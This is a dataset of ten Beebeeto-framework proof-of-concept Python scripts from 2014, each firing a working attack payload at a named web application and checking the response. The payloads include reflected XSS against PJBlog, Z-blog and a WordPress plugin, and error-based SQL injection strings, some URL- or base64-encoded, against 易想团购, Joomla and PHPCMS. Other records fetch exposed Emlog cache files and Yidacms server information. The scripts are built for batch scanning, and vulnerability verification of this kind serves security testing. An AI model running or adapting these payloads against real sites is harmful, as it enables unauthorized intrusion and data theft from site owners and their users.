{"create_date": "2014-12-09 23:02:42", "name": "PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Getarticle.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0187',\r\n 'name': 'PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PJBlog',\r\n 'vul_version': ['3.0.6.170'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Getarticle.asp','asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp',\r\n 'references': ['http://sebug.net/vuldb/ssvid-11237',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/Getarticle.asp?id=1&blog_postFile=x%22%20)></a>%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E&page=2'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp", "app_name": "PJblog", "id": "poc-2014-0187", "layer4_protocol": null}
{"create_date": "2014-12-09 22:08:37", "name": "Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Zblog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0184',\r\n 'name': 'Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zblog',\r\n 'vul_version': ['1.8'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Zblog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.asp', 'asp'],\r\n 'desc': '''\r\n search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-19246',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/search.asp?q=%3Ciframe%20src%3D%40%20onload%3Dalert%281%29%3E'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<iframe src=@ onload=alert(1)>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002", "app_name": "Z-blog", "id": "poc-2014-0184", "layer4_protocol": null}
{"create_date": "2014-12-09 19:03:49", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/subscribe.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0181',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/subscribe.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.it165.net/safe/html/201308/701.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/subscribe.php?act=unsubscribe&code=YScgYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50K\"\r\n \"CopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHg3ZSxtZDUoNjY2KSwweDdlKS\"\r\n \"kpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMik\"\r\n \"peCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSM=\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0181", "layer4_protocol": null}
{"create_date": "2014-12-09 18:57:23", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/vote.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0180',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/vote.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://wooyun.org/bugs/wooyun-2010-03969',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(666),\"\r\n \"0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0180", "layer4_protocol": null}
{"create_date": "2014-12-09 18:39:09", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0178',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.2cto.com/Article/201304/203406.html',\r\n 'http://vul.jdsec.com/index.php/vul/JDSEC-POC-20141208-1321',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/ajax.php?act=check_field&field_name=%61%27%20%61%6E%64%28%73%65%6C%65%63%74%20\"\r\n \"%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63\"\r\n \"%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20\"\r\n \"%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37\"\r\n \"%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D\"\r\n \"%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72\"\r\n \"%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F\"\r\n \"%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if '63e1f04640e83605c1d177544a5a0488' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0178", "layer4_protocol": null}
{"create_date": "2014-12-09 18:08:15", "name": "Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "EMLOG\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/content/cache/user,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0177',\r\n 'name': 'Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'EMLOG',\r\n 'vul_version': ['<4.2.1'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['EMLOG\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/content/cache/user', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user , /content/cache/options',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-02955',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload1 = '/content/cache/user'\r\n payload2 = '/content/cache/options'\r\n verify_url = args['options']['target'] + payload1\r\n verify_url2 = args['options']['target'] + payload2\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] Request URL: ' + verify_url2\r\n # user\r\n content = urllib2.urlopen(verify_url).read()\r\n # options\r\n content2 = urllib2.urlopen(verify_url2).read()\r\n if args['options']['target'] in content2 and 'avatar' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user , /content/cache/options", "app_name": "Emlog", "id": "poc-2014-0177", "layer4_protocol": null}
{"create_date": "2014-12-08 18:01:44", "name": "WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "nick233", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,XSS\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0176',\r\n 'name': 'WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC',\r\n 'author': 'nick233',\r\n 'create_date': '2014-12-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['*'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Cross site scripting has benn found on instasqueeze/lp/index.php\r\n inurl:wp-content/plugins/instasqueeze\r\n ''',\r\n 'references': ['https://www.yascanner.com/#!/x/11200',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-content/plugins/instasqueeze/lp/index.php?id=\"/><script>alert(233)</script>'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has benn found on instasqueeze/lp/index.php\r\ninurl:wp-content/plugins/instasqueeze", "app_name": "WordPress", "id": "poc-2014-0176", "layer4_protocol": null}
{"create_date": "2014-12-04 18:22:34", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Yidacms\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/Yidacms/user/user.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0172',\r\n 'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Yidacms',\r\n 'vul_version': ['3.2'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Yidacms\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/Yidacms/user/user.asp', 'asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-074065',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/yidawap/syscome.asp?stype=safe_info'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\u670d\u52a1\u5668\u76f8\u5bf9\u4e0d\u5b89\u5168\u7684\u7ec4\u4ef6\u68c0\u6d4b' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp", "app_name": "yidacms", "id": "poc-2014-0172", "layer4_protocol": null}
{"create_date": "2014-11-30 21:07:42", "name": "Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,com_departments,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0170',\r\n 'name': 'Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-11-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'com_departments', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-19358',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php?option=com_departments&id=-1 UNION SELECT 1,md5(666),3,4,5,6,7,8--\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Joomla", "id": "poc-2014-0170", "layer4_protocol": null}
{"create_date": "2014-11-30 20:55:07", "name": "PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/digg_add.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0169',\r\n 'name': 'PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-11-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['2007'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['PHPCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/digg_add.php', 'php'],\r\n 'desc': 'PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/digg/digg_add.php?id=1&con=2&digg_mod=digg_data WHERE 1=2 +and(select 1 from(\"\r\n \"select count(*),concat((select (select (select concat(0x7e,md5(3.1415),0x7e))) from \"\r\n \"information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.\"\r\n \"tables group by x)a)%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '63e1f04640e83605c1d177544a5a0488' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165", "app_name": "phpcms", "id": "poc-2014-0169", "layer4_protocol": null}
